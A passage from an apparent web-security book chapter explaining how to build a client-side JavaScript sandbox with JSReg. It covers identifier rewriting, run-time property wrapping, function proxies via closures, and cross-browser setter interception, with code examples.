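// (?<!a) is a negative look-behind: match "b" only when it is not
// immediately preceded by "a". The "a" itself never becomes part of the match.
var notAfterA = /(?<!a)b/;

notAfterA.test('ab'); // false - the only "b" follows "a"
notAfterA.test('cb'); // true  - "b" follows "c", so the condition holds
```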
Code replacement
Using code replacement allows you to use the executing environment such as a browser, but enables you to whitelist the code that can be executed. This solves the problem of the sandboxing system breaking when new features are added to the language. Using a blacklist method, you may forget one little detail that would enable a sandbox escape.
The basic design of the rewriting code replacement layer is to perform a global regular expression match without using starting anchors such as ^ or ending anchors such as $. It works by using JavaScript's replace function to scan for each supplied regular expression in turn. Without a specific starting point, it simply continues through the text until it finds a match. The basic design is as follows:
"match1match2match3".replace(/(match1)|(match2)/g, function($0, $match1, $match2) {
  if($match1 !== undefined && $match1.length) {
    alert($match1);
  } else if($match2 !== undefined && $match2.length) {
    alert($match2);
  }
});
The individual regular expressions are grouped together, so each group inside the combined expression represents an operator, a literal, or whatever else you want to match. Each group is assigned a variable prefixed with $ to indicate that it is part of a regular expression match. The if statements are required to work around how some browsers define the matches from the regular expressions. This is a very powerful method of sandboxing, because each match can then be worked on again or replaced. The whitelisting method was simple: instead of allowing variables as supplied by the user, we replace them with a prefix of $ and a suffix of $. Therefore, the variable window becomes $window$.
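A rough sketch of that rewrite step (our own simplified illustration, not JSReg's actual rewriter, which must also skip string literals, keywords, and property names):

```javascript
// Rewrite every bare identifier in untrusted source to $identifier$.
// Because the host page never defines variables with this prefix/suffix,
// the rewritten code can only touch properties we deliberately expose.
function prefixIdentifiers(code) {
  return code.replace(/[a-zA-Z_]\w*/g, function(identifier) {
    return '$' + identifier + '$';
  });
}

prefixIdentifiers('window');   // "$window$"
prefixIdentifiers('alert(1)'); // "$alert$(1)"
```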
Handling objects
We have arrays covered and we are whitelisting our code, but what about the things we cannot whitelist, such as property names that are calculated dynamically? We cannot assign them a prefix and suffix in advance, because we do not know the result until after the code has run. For dynamically calculated values, we need to add a run-time function that applies the prefix and suffix. The following code shows why such values are not known until execution:
prop='a';
obj={a:123};
obj[prop];
Replacing obj[prop] with obj['$prop$'] would return an incorrect value for the original code. To continue our sandboxing, we must instead make the replacement call a function of ours that calculates the correct property at run time. Here is what obj[prop] looks like after our replacement:
obj[runtimeFunc(prop)];
In this way, we can control the result of any code inside square brackets. The runtimeFunc will add a prefix and suffix of $ to the computed property name. Provided that the attacker cannot modify our function and that the replacement always occurs, we can ensure that the property will always be sandboxed.
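A minimal sketch of what such a run-time function might look like (the name runtimeFunc and the details are illustrative; JSReg's real function must also handle numeric array indexes and other edge cases):

```javascript
// Applied at run time to dynamically computed property names, so that
// obj[prop] actually reads the sandboxed $prop$ slot the rewriter created.
function runtimeFunc(prop) {
  return '$' + prop + '$';
}

var obj = {};
obj['$a$'] = 123;          // the sandboxed property created by the rewriter

var prop = 'a';
obj[runtimeFunc(prop)];    // resolves to obj['$a$'], i.e. 123
```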
Layers
To mitigate attacks, it is important to layer your defenses and expect your defenses to be broken. In this way, your sandbox will be harder to break. For example, you can use replacements to force a whitelist, perform error checking on supplied code, and check if a window object leaks. Looking back over the previous exploits of JSReg, the layered defense often prevented further attacks and minimized the damage of the sandbox escape to global variable assignments.
Proxying
Once a sandbox is in place, the next step is to proxy existing functions that we want to allow access to. When proxying functions you need to consider object leakage and any calls to the DOM. An issue in Firefox to look out for is native objects leaking window; this issue could be applied to other browsers in the future, so it is worth applying a proxy function in every browser. A closure is a good choice when creating a proxy function, as you can supply any global objects a function has access to without exposing the window object. The variables passed to the closure are sent before the proxied function is defined. The following code shows a function proxy:
<script type="text/javascript" src="http://jsreg.googlecode.com/svn-history/r62/trunk/JSReg/JSReg.js"></script>
<script type="text/javascript">
window.onload = function() {
  var parser = JSReg.create();
  parser.extendWindow("$alert$", (function(nativeAlert) {
    return function(str) {
      nativeAlert(str);
    }
  })(window.alert));
  parser.eval("alert(123);alert(alert);");
}
</script>
In this instance, the extendWindow method allows you to add methods to a sandboxed window object that is really named $window$ and that follows our prefix and suffix. Notice that we name our function $alert$ and that the eval'd code is alert. As we discussed in the “Code Replacement” section earlier, all code supplied to the sandbox is replaced with the prefix and suffix, so alert becomes $alert$. We use the closure to send the native function alert to our proxy function where we can call the native whenever we like and perform any checks before the actual native is run. In a real-world situation, we might limit the number of alerts that can be called to prevent a client-side denial of service. We can do this within the scope of our proxy function.
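The denial-of-service limit mentioned above can be sketched as a generic closure-based proxy; makeLimitedProxy is our own illustrative helper, and a plain function stands in for window.alert so the sketch runs anywhere:

```javascript
// Wrap any function in a proxy that silently ignores calls past a limit.
// The closure keeps both the native reference and the counter private,
// so sandboxed code can neither read nor reset them.
function makeLimitedProxy(nativeFn, limit) {
  var count = 0;
  return function() {
    if (count >= limit) {
      return; // swallow the call instead of hammering the user
    }
    count++;
    return nativeFn.apply(null, arguments);
  };
}

// Stand-in for window.alert, recording what would have been shown.
var shown = [];
var fakeAlert = function(msg) { shown.push(msg); };

var alertProxy = makeLimitedProxy(fakeAlert, 3);
for (var i = 0; i < 10; i++) {
  alertProxy(i);
}
// only the first 3 calls reach the native function
```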
A closure is a function that retains access to the scope in which it was created; in the pattern used here, it is a function that returns a function. It is a powerful programming technique and is very useful for sandboxing.
Proxying assignments is quite difficult if you want to maintain compatibility with older browsers, as the technique requires some form of setter syntax. Getters and setters are supported in Firefox, IE8, Chrome, Opera, and Safari, but not in earlier versions of Internet Explorer, or at least not in a standard form. From a sandboxing point of view, you might want to intercept assignments such as document.body.innerHTML. In Firefox, Chrome, Opera, or Safari, you can use the __defineSetter__ syntax in JavaScript (https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object/defineSetter). This function takes two arguments: the name of the property on which the setter should be called, and the function to be called. The setter function is passed one argument containing whatever has been assigned. ECMAScript 5 introduced a new way to perform setter assignments using the defineProperty function (http://msdn.microsoft.com/en-us/library/dd229916%28VS.85%29.aspx). This method is far more powerful than the nonstandard __defineSetter__ syntax, one reason being the control it gives you over the object. Instead of supplying two arguments, you provide a property descriptor. This allows you to define a setter, a getter, and how the property can be used (e.g., making it nonenumerable).
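The contrast between the descriptor form and the legacy two-argument form can be sketched on plain objects (the property name color and the intercepted log are our own illustration):

```javascript
var intercepted = [];

// ECMAScript 5 style: a full property descriptor gives you the setter,
// an optional getter, and control over enumerability in one call.
var obj = {};
Object.defineProperty(obj, 'color', {
  enumerable: false,  // extra control only the descriptor form offers
  set: function(val) { intercepted.push(val); },
  get: function() { return intercepted[intercepted.length - 1]; }
});
obj.color = 'red';    // routed through the setter
obj.color;            // 'red' at this point, via the getter

// Legacy style: two arguments only - the property name and the setter
// function - with no way to configure enumerability.
var legacy = {};
legacy.__defineSetter__('color', function(val) { intercepted.push(val); });
legacy.color = 'blue';
```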
To be compatible with earlier versions of Internet Explorer such as IE7, we can use nonstandard functionality to emulate setters. The onpropertychange event (http://msdn.microsoft.com/en-us/library/ms536956%28VS.85%29.aspx) calls a function when a DOM object, usually an HTML element, has an attribute modified. Putting all this together, we can create setter emulation that works in the majority of browsers. Gareth (one of the authors of this book) created a sandboxed DOM API that combines all of these techniques to successfully intercept DOM assignments. The following code shows how to use feature detection and fallbacks to provide the most compatible way to listen for these assignments.
The most recent feature is detected first: if the browser supports Object.defineProperty, that test passes first; then Object.__defineSetter__ is checked; and as a fallback, it is assumed that onpropertychange will be supported. If the code fails, it fails gracefully, as it is simply ignored by browsers that do not support it. There is an interesting problem in IE8's support of the defineProperty syntax: it only supports DOM elements, not literal JavaScript objects. This presents a problem for sandboxed code because, for example, a setter checking for styles being assigned to a style property, as in the code sample, would never be called on a plain object. Unfortunately, the hack around this is quite ugly; you have to create an empty tag and use that DOM object to check assignments:
var styles = document.createElement('span');
node['$' + 'hasChildNodes' + '$'] = node['hasChildNodes'];
node['$' + 'nodeName' + '$'] = node['nodeName'];
node['$' + 'nodeType' + '$'] = node['nodeType'];
node['$' + 'nodeValue' + '$'] = node['nodeValue'];
node['$' + 'childNodes' + '$'] = node['childNodes'];
node['$' + 'firstChild' + '$'] = node['firstChild'];
node['$' + 'lastChild' + '$'] = node['lastChild'];
node['$' + 'nextSibling' + '$'] = node['nextSibling'];
node['$' + 'previousSibling' + '$'] = node['previousSibling'];
node['$' + 'parentNode' + '$'] = node['parentNode'];
for(var i = 0; i < cssProps.length; i++) {
  var cssProp = cssProps[i];
  if(Object.defineProperty) {
    node.$style$ = styles;
    Object.defineProperty(node.$style$, '$' + cssProp + '$', {
      set: (function(node, cssProp) {
        return function(val) {
          var hyphenProp = cssProp.replace(/([A-Z])/g, function($0, $1) {
            return '-' + $1.toLowerCase();
          });
          var safeCSS = CSSReg.parse(hyphenProp + ':' + val).replace(new RegExp('^' + hyphenProp + '[:]'), '').replace(/;$/, '');
          node.style[cssProp] = safeCSS;
        }
      })(node, cssProp)
    });
  } else if(Object.__defineSetter__) {
    styles.__defineSetter__('$' + cssProp + '$', (function(node, cssProp) {
      return function(val) {
        var hyphenProp = cssProp.replace(/([A-Z])/g, function($0, $1) {
          return '-' + $1.toLowerCase();
        });
        var safeCSS = CSSReg.parse(hyphenProp + ':' + val).replace(new RegExp('^' + hyphenProp + '[:]'), '').replace(/;$/, '');
        node.style[cssProp] = safeCSS;
      }
    })(node, cssProp));
  } else {
    document.getElementById('styleObjs').appendChild(styles);
    node.$style$ = styles;
    node.$style$.onpropertychange = (function(node) {
      return function() {
        if(/^[$].+[$]$/.test(event.propertyName)) {
          var cssProp = (event.propertyName + '').replace(/^[$]|[$]$/g, '');
          var hyphenProp = cssProp.replace(/([A-Z])/g, function($0, $1) {
            return '-' + $1.toLowerCase();
          });
          var safeCSS = CSSReg.parse(hyphenProp + ':' + event.srcElement[event.propertyName] + '').replace(new RegExp('^' + hyphenProp + '[:]'), '').replace(/;$/, '');
          node.style[cssProp] = safeCSS;
        }
      }
    })(node);
  }
}
The onpropertychange event suffers from the same limitation, so the same dummy element can be used in both cases to provide reliable setter assignment and cross-browser compatibility. The next code sample shows how to put these pieces together and form your own cross-browser setters independently of the DOM API. We will create an object, assign it a styles property, and then intercept any assignments.
<body>
<script type="text/javascript" src="http://jsreg.googlecode.com/svn-history/r62/trunk/JSReg/JSReg.js"></script>
<script>
window.onload = function() {
  var obj = {};
  var parser = JSReg.create();
  var styles = document.createElement('span');
  if(Object.defineProperty) {
    obj.$styles$ = styles;
    Object.defineProperty(obj.$styles$, '$color$', {set: function(val) {alert('Intercepted:' + val);}});
  } else if(Object.__defineSetter__) {
    styles.__defineSetter__('$color$', function(val) {
      alert('Intercepted:' + val);
    });
  } else {
    document.body.appendChild(styles);
    obj.$styles$ = styles;
    obj.$styles$.onpropertychange = function() {
      if(event.propertyName == '$color$') {
        alert('Intercepted:' + event.srcElement[event.propertyName]);
      }
    }
  }
  obj.$styles$ = styles;
  parser.extendWindow('$obj$', obj);
  parser.eval("obj.styles.color=123");
}
</script>
</body>
The code sample shows how to intercept the assignment styles.color on the obj we created. The styles object is created using a span and is assigned as a property of obj. We then test for defineProperty; if it is available, we assign a sandboxed $styles$ property to the span element we created. Then we create a setter using the "fake" styles (the span element); the setter looks for $color$. Normally, the setter would be created multiple times for the various different values. The setter function takes one argument, val, which contains the result of the assignment. Next, we check for __defineSetter__. If the browser does not have Object.defineProperty, this process is simpler, as we can just create a setter on our object that mirrors the defineProperty setter. Lastly, the fallback assumes the browser is earlier than IE8; here we have to add our span element to the DOM for the onpropertychange event to fire, then assign its reference to our object obj. The syntax is quite different from the previous two examples, as these are actual events being called. We must check that the assignment really is our target property $color$, which we do using event.propertyName, and we obtain the value being assigned using event.srcElement[event.propertyName]. The good thing about the fallback is that onpropertychange simply will not fire if the browser does not support it, so in the worst case the assignment will not be intercepted and the sandboxed property will just be added with no effect on the DOM. Finally, we add our object to the sandboxed window using extendWindow, which lets us intercept any assignment to the $color$ property in pretty much every browser, including IE7 and earlier.
Summary
At this point, you should have some insight regarding how to handle untrusted code at the server side and the client side. Using the techniques we discussed in this chapter, you should be able to create a client-side sandbox that takes setter assignments into account. This would be useful for client-side malware analysis, as it would allow you to execute the code, but prevent actual DOM manipulation while still monitoring what has been assigned. If you want to handle untrusted code and include it on your Web site, perhaps accepting code from the user or online advertisements, this chapter should have given you the groundwork and the knowledge to create your own system or implement one correctly. Programmers make mistakes. However, programmers who test and break their own code will produce better-quality code that is more secure than programmers who do not. Learn to think like the bad guys, and you will spot your obvious mistakes.